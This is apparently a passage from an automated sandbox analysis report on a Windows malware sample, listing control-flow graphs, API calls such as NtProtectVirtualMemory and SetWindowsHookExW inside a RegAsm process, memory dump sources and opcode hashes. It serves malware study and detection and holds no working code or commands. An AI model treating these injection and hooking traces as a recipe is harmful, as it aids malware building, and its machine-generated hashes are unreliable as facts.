                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:16.7%
                                                                                                Total number of Nodes:18
                                                                                                Total number of Limit Nodes:1

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 031A33F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: c7b1995083cdcce510bfb741394c87be2409b9b141552f432730e1cdfc1da2c1
                                                                                                • Instruction ID: 010627edb36ae77608e0599c71c9651f2bce7dcda20687f6ecca2a67bcc0e364
                                                                                                • Opcode Fuzzy Hash: c7b1995083cdcce510bfb741394c87be2409b9b141552f432730e1cdfc1da2c1
                                                                                                • Instruction Fuzzy Hash: 46E1C13DF0470547DF58CAAD8C903AEB6A36FCC222F5C862AD926DB784EB74D8055740

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 031A33F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2706961497-0
                                                                                                • Opcode ID: 22989e3c4ce6511d642d3c5806356023a21ec5d9c6814fdb39ae56dab13eee29
                                                                                                • Instruction ID: 4c95d1dff3dd97f2f8d3baa69b6138dd8a140f5b3a477a5053c7bc020fe745f2
                                                                                                • Opcode Fuzzy Hash: 22989e3c4ce6511d642d3c5806356023a21ec5d9c6814fdb39ae56dab13eee29
                                                                                                • Instruction Fuzzy Hash: A621EFB5D003499FDB10CFAAD980BDEFBF5FF48310F24882AE519A7210C73599158BA4

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0Hq$0Hq$$q
                                                                                                • API String ID: 0-296434829
                                                                                                • Opcode ID: 0c5415ea1550eb97cb87928981a619e0eb0e87e146a75c224b5ae5868385a26a
                                                                                                • Instruction ID: 615d204f9db6e5f2ea0ad7adebe00343beb7e8d2a86791fd9a81cd283f8734df
                                                                                                • Opcode Fuzzy Hash: 0c5415ea1550eb97cb87928981a619e0eb0e87e146a75c224b5ae5868385a26a
                                                                                                • Instruction Fuzzy Hash: 69B18E70B002199FDB58DF6DD8507AEB7E7FFC9610B248529E909D7390DA30DC428BA1

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q$$q
                                                                                                • API String ID: 0-3126353813
                                                                                                • Opcode ID: 985086303a85b1e4c6ed90769354ce1d7fe40de40f485461bcb28197b902b0ba
                                                                                                • Instruction ID: 007c40ec92aadb09de3bfc31ce5013c107c9c3f7f1e5d5122d1d0b0996be32fa
                                                                                                • Opcode Fuzzy Hash: 985086303a85b1e4c6ed90769354ce1d7fe40de40f485461bcb28197b902b0ba
                                                                                                • Instruction Fuzzy Hash: 0141AEB2300521CBC3499B19CA4562EF7B3BB856057398648E0029B761CF3BEC53DB85

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031A9016,?,?,?,?,?), ref: 031A90D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 2660cf301569fe53d09433f8f4f5c5f0bf66b724530ccc75c7c1535f94a2cf13
                                                                                                • Instruction ID: b199401f5dfdfa4e22f5c9dcc1ae080b203f1675e274480535bfc11ef3632adc
                                                                                                • Opcode Fuzzy Hash: 2660cf301569fe53d09433f8f4f5c5f0bf66b724530ccc75c7c1535f94a2cf13
                                                                                                • Instruction Fuzzy Hash: 7021F4B5900248EFDB10CFAAD584BDEBBF8EB48210F14841AE914A7350D374A944CFA4

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031A9016,?,?,?,?,?), ref: 031A90D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: b43327a3f9c4668eccfd2bdf88c08cbebadbac8dec286b99ebc27a882e068541
                                                                                                • Instruction ID: f86ba7f19cb7d01a6fb966fb76a0829dbb673d2e7a2fcc0a57ea6432653743fb
                                                                                                • Opcode Fuzzy Hash: b43327a3f9c4668eccfd2bdf88c08cbebadbac8dec286b99ebc27a882e068541
                                                                                                • Instruction Fuzzy Hash: 4F21E3B5D00248EFDB10CFAAD984ADEFBF9EB48310F14841AE914A7350D379A954CFA5

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 031A3D73
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: 332b6a769612de10026bfc3f229e80fa0d157c58accfa6292b217f78510c2a3e
                                                                                                • Instruction ID: f35cac04c433603e088c583c9851e68af729ec3c6e09567e85d7bb5a11eb0e1f
                                                                                                • Opcode Fuzzy Hash: 332b6a769612de10026bfc3f229e80fa0d157c58accfa6292b217f78510c2a3e
                                                                                                • Instruction Fuzzy Hash: 70212579D00648DFDB14DFAAC844BDEFBF5EB88310F14882AD428A7250CB75A940CFA5

                                                                                                Control-flow Graph
                                                                                                • Rendered graph not recoverable; basic blocks and edges as extracted (node id: address range -> successor ids):
                                                                                                • 626: 31a3cf8-31a3d42 -> 628, 629
                                                                                                • 628: 31a3d4e-31a3d80, calls SetWindowsHookExW -> 630, 631
                                                                                                • 629: 31a3d44 -> 632
                                                                                                • 630: 31a3d89-31a3dae
                                                                                                • 631: 31a3d82-31a3d88 -> 630
                                                                                                • 632: 31a3d4c -> 628
                                                                                                APIs
                                                                                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 031A3D73
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630270473.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_31a0000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: b0a959717a8db385c00a483e6d8a43ca6774392683cd5d85d290e6806c22274b
                                                                                                • Instruction ID: edd68ab195e3762faf5647f0320f4cc24aec78d49d3d836fe0c42030abc072fe
                                                                                                • Opcode Fuzzy Hash: b0a959717a8db385c00a483e6d8a43ca6774392683cd5d85d290e6806c22274b
                                                                                                • Instruction Fuzzy Hash: E1212779D00648DFDB14DFAAC844BEEFBF5EB88310F14881AD419A7250CB75A944CFA5

                                                                                                Control-flow Graph
                                                                                                • Rendered graph not recoverable; basic blocks and edges as extracted (node id: address range -> successor ids), no API calls annotated:
                                                                                                • 756: 7022ed8-7022f08 -> 759, 760
                                                                                                • 759: 7022f0a-7022f12 -> 761, 762
                                                                                                • 760: 7022f3e-7022f58 -> 767, 768
                                                                                                • 761: 7022f20-7022f2f -> 766
                                                                                                • 762: 7022f14-7022f16 -> 761
                                                                                                • 766: 7022f34-7022f3b
                                                                                                • 767: 7022f5a-7022f62 -> 769, 770
                                                                                                • 768: 7022f8e-7022fd8 -> 770, 778
                                                                                                • 769: 7022f70-7022f8b
                                                                                                • 770: 7022f64-7022f66 -> 769
                                                                                                • 778: 7022fda-7023022 -> 781, 782
                                                                                                • 781: 7023024-7023027 -> 783
                                                                                                • 782: 7023029 -> 783
                                                                                                • 783: 702302b-7023096 -> 792, 793
                                                                                                • 792: 70230a6 -> 794
                                                                                                • 793: 7023098-70230a4 -> 794
                                                                                                • 794: 70230a8-70230ac -> 796, 797
                                                                                                • 796: 70230ae-70230ba -> 798
                                                                                                • 797: 70230bc -> 798
                                                                                                • 798: 70230be-70230df
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'q
                                                                                                • API String ID: 0-1807707664
                                                                                                • Opcode ID: d591029f2ab4fb5dd702f6749c849a501cc314fcc330dc6799d8a27c50d74de3
                                                                                                • Instruction ID: a8a227cb16437ceac3c37749da3fc2d8ce68da445f0f5bc76517fe2785e8c2bb
                                                                                                • Opcode Fuzzy Hash: d591029f2ab4fb5dd702f6749c849a501cc314fcc330dc6799d8a27c50d74de3
                                                                                                • Instruction Fuzzy Hash: 2951B171B002158FCB54DBADD850AAEFBF6EFC9210B14816AE905EB354DE34DC0287A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: ea7a7bc6bd67ff7befe17fec2aeb2d636440476995cf4d397d97f3fb8184035e
                                                                                                • Instruction ID: 3ee04f0b8f20666bad2fef8aae8aede876c06fd0938689049399c7e1f4981f86
                                                                                                • Opcode Fuzzy Hash: ea7a7bc6bd67ff7befe17fec2aeb2d636440476995cf4d397d97f3fb8184035e
                                                                                                • Instruction Fuzzy Hash: 0551AD71A00211DFE724CF29D944B69BBF6FF48720F214299E5119B7A0CB76EC41CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 4dca01727b2e5b4b36ffff47735fc4a5e4106d5a8cb270ab42c74a610240ba85
                                                                                                • Instruction ID: eaddc14a02951eab1c841b421769e21b41e7fb25ba139ae2801c8f97f372bc96
                                                                                                • Opcode Fuzzy Hash: 4dca01727b2e5b4b36ffff47735fc4a5e4106d5a8cb270ab42c74a610240ba85
                                                                                                • Instruction Fuzzy Hash: 0941C1B2304511CBC30A9B18860552DBBB3BF8560573D8689E0429B752CB3BEC53DB85
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 107ddb2d5bffc9997cab450068d3c961a5e83a51482ca29e397ca0d2dad37b06
                                                                                                • Instruction ID: efc5199f5ce385dfcafd55f10abfff68f228c0fbac6509b2c1fe7d4a5b5dbb31
                                                                                                • Opcode Fuzzy Hash: 107ddb2d5bffc9997cab450068d3c961a5e83a51482ca29e397ca0d2dad37b06
                                                                                                • Instruction Fuzzy Hash: 9F31E8B1B102159FD7149B69C455BEE7EF7AF88710F284059E501EB390CFB48C02DB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 968b61a7493bb23e1e89dd730474fb9ad5af122d20429c079997ad3180e0b26f
                                                                                                • Instruction ID: 8ec288b4eb0603b83ce902fdd49a11bcc89028a92578caf717065c473fb658c2
                                                                                                • Opcode Fuzzy Hash: 968b61a7493bb23e1e89dd730474fb9ad5af122d20429c079997ad3180e0b26f
                                                                                                • Instruction Fuzzy Hash: 5721AE717101248FCB84DB68C959BAD77F6AF8C710F2841AAE502EB3A0CF708C029B51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 1abfb3efd47fe53683d17b244078bc3ee4f05ccb9687b13f3eaa9258a2017de6
                                                                                                • Instruction ID: 169b2875da99ba3a6b29abaa3008c3a62d8870713ee3df8d3e2802f8c2ca617a
                                                                                                • Opcode Fuzzy Hash: 1abfb3efd47fe53683d17b244078bc3ee4f05ccb9687b13f3eaa9258a2017de6
                                                                                                • Instruction Fuzzy Hash: DF2190717101248FDB94DB68C958B6E77FAAF88711F2542AAF502DB3A0CF708C019B95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 0c6bc7b641c48fc9d516a22c024940f64fae8c8141d090596f19aafd1fc29e2f
                                                                                                • Instruction ID: 9fdb0d1db0ab5bd5eedafb26cab7bf3db89234da6da01e05216551828de3a3f6
                                                                                                • Opcode Fuzzy Hash: 0c6bc7b641c48fc9d516a22c024940f64fae8c8141d090596f19aafd1fc29e2f
                                                                                                • Instruction Fuzzy Hash: D02127B1714215DFDB14CF58C919BAE7BF6AF48714F140559E602EB391CB744C06DB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: 612a2907e5d25d748d1d02390329f319b5879caf5886c59097cd3ee57cee1acf
                                                                                                • Instruction ID: 85e0c06741adc2d3969a8d0aa1b748b324e7e26ea22069445da77835f06ca772
                                                                                                • Opcode Fuzzy Hash: 612a2907e5d25d748d1d02390329f319b5879caf5886c59097cd3ee57cee1acf
                                                                                                • Instruction Fuzzy Hash: 9D118171B102049FDB14EF69C898FAEBBE6EF88714F144059E901EB7A1CA719C01DB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 402dd73de13e8ecef1c9cc23ebfce632f6eb05c7e6d967d0d048c6128d4b7ea5
                                                                                                • Instruction ID: 88997cd1616dae391f8668814e034d4232cd7806efaf15d22ac3407f96f922f3
                                                                                                • Opcode Fuzzy Hash: 402dd73de13e8ecef1c9cc23ebfce632f6eb05c7e6d967d0d048c6128d4b7ea5
                                                                                                • Instruction Fuzzy Hash: 47119EB27002155BE768DA6ED804A6AB79BEFC4650724813AF604CF274DA31DC4287A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Teq
                                                                                                • API String ID: 0-1098410595
                                                                                                • Opcode ID: ba974c1953f72caa58cdf8de1dd789d77b98b51b853121d44ff9c4ae131d4cc7
                                                                                                • Instruction ID: 4e9ba32a7ff75588c6d057db6584c24caa9274b813d91e59224cb8dac50e55e0
                                                                                                • Opcode Fuzzy Hash: ba974c1953f72caa58cdf8de1dd789d77b98b51b853121d44ff9c4ae131d4cc7
                                                                                                • Instruction Fuzzy Hash: 850180717101149FDB149B59C959B6E7BF6AF8C710F250069F502EB3A1CF719D02CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $q
                                                                                                • API String ID: 0-1301096350
                                                                                                • Opcode ID: 50f049af4e886d0255444d6d1ad932da52b7a02b3f86e14079b8c7fbc88fb1c7
                                                                                                • Instruction ID: df15c3601addbdc17f02d0ce6a62dac1b70929943705e9eafa2578612bbe4127
                                                                                                • Opcode Fuzzy Hash: 50f049af4e886d0255444d6d1ad932da52b7a02b3f86e14079b8c7fbc88fb1c7
                                                                                                • Instruction Fuzzy Hash: 7A01F9717013671BE3659A3E8804A6B7B9FAFC56407144169F105CF275DE30DC0243E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf6bf3bf617204f4291c1fe5b45ce579718b610dbe21967c725ee1ee6a7b7af3
                                                                                                • Instruction ID: 3658200b503be128ded4b4a4f71be06ffa9a0e6de12f6156a5da9a91110736af
                                                                                                • Opcode Fuzzy Hash: bf6bf3bf617204f4291c1fe5b45ce579718b610dbe21967c725ee1ee6a7b7af3
                                                                                                • Instruction Fuzzy Hash: 0DF1D0717002159FDB55DFA8D854AAEBBB6FF89310F14816AE906CB351CB31EC06CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 16ff0215e8214991dcb8226a20c099fa4ac2d4209511bf488f676878151cccf0
                                                                                                • Instruction ID: 55594a058d6478f11b17c2a84b953204e0261fe9e1652113be24cf95f2badd5a
                                                                                                • Opcode Fuzzy Hash: 16ff0215e8214991dcb8226a20c099fa4ac2d4209511bf488f676878151cccf0
                                                                                                • Instruction Fuzzy Hash: CB91DF74B007118FDB58EF78D89466D77E2EF89250F208669E9068B345EF35DC06CB92
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ebafd4afa00d7427aa8c44daaf9b2fee18dec9c15f17e9803b48d7440bb9886a
                                                                                                • Instruction ID: 591c925e90b14bccaad72cf5b0e4674f21f0cd443e2fab1f69e7f721416a6be1
                                                                                                • Opcode Fuzzy Hash: ebafd4afa00d7427aa8c44daaf9b2fee18dec9c15f17e9803b48d7440bb9886a
                                                                                                • Instruction Fuzzy Hash: 4F81AE76B002168FDB14DFA8E450BAEB7B2FB88300F15852AE901D7384CB35DD52DB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f42c1cd8d3846ce6d6a5ff3e0727dec47bb618358d41b626f78729c0c04ddd5b
                                                                                                • Instruction ID: 09b210f45328f91411c9baa4133a44c6860cf133238f09cefc23d502ddb39af2
                                                                                                • Opcode Fuzzy Hash: f42c1cd8d3846ce6d6a5ff3e0727dec47bb618358d41b626f78729c0c04ddd5b
                                                                                                • Instruction Fuzzy Hash: ED919FB1A04211CFDB58EF28E80879977B3F78E358F54431AC8008B798E7769886DF61
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdc06b902b15eb711fe9b16c628734c08c9b8a5655d5dfea9b53f0d56f5dd2b4
                                                                                                • Instruction ID: 8e88aa36774fb9defd3b2fee216ca97e9045f5b88d3b792a59dcfbe050d54d86
                                                                                                • Opcode Fuzzy Hash: fdc06b902b15eb711fe9b16c628734c08c9b8a5655d5dfea9b53f0d56f5dd2b4
                                                                                                • Instruction Fuzzy Hash: 104124B6D01218EFDB24CFA9D944BDEBBF5EF48300F20816AE415AB250DB309946CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f080959f0e57d42a2e9d6d283657d37dee12503dd84eb945de2a2f4bb0781f7c
                                                                                                • Instruction ID: ac5b14ed375ad722185256bb134aab0ce2af847da517f589dbf8f4272e8de88b
                                                                                                • Opcode Fuzzy Hash: f080959f0e57d42a2e9d6d283657d37dee12503dd84eb945de2a2f4bb0781f7c
                                                                                                • Instruction Fuzzy Hash: 56418E75A00615CFCB04DFA8C584E6AFBB2FF44305F1181A5E851AB7A6C735EC42CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 238e82894deede97b048ccbe8f6bece6eace7dbd09d48c0549a3a2e372da9162
                                                                                                • Instruction ID: 2e3bf558d4455f210d3eb888992f93e253a64dd9e175c30e032adf4fdf33564a
                                                                                                • Opcode Fuzzy Hash: 238e82894deede97b048ccbe8f6bece6eace7dbd09d48c0549a3a2e372da9162
                                                                                                • Instruction Fuzzy Hash: 874125B5D01218EFDB24CFA9C984BDEBBF5EF48304F20816AE415AB250DB705946CF54
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2635483590.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_7020000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5e063bacc6619e5fe9f604fd876104333cd7a3b24f97d5500b03393f673f4741
                                                                                                • Instruction ID: f55141e6bbc87dfb9d43e18d490e210c3df4cab93bd6e00d0c5db661d99c0ba2
                                                                                                • Opcode Fuzzy Hash: 5e063bacc6619e5fe9f604fd876104333cd7a3b24f97d5500b03393f673f4741
                                                                                                • Instruction Fuzzy Hash: 562137353013204BDB64AB38D8A56BE3BD7DB88244B108629DA06C7349FF35CC0787E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.2630044075.000000000188D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0188D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_14_2_188d000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: df4e6b0150ead07df380c603607deb0c23aff6d7cfd3c2e14a52589616784fa7
                                                                                                • Instruction ID: c1f741449e589bd339ed7ab36990a0e68c9990de0b1b48e8d20b8034bff9b9bb
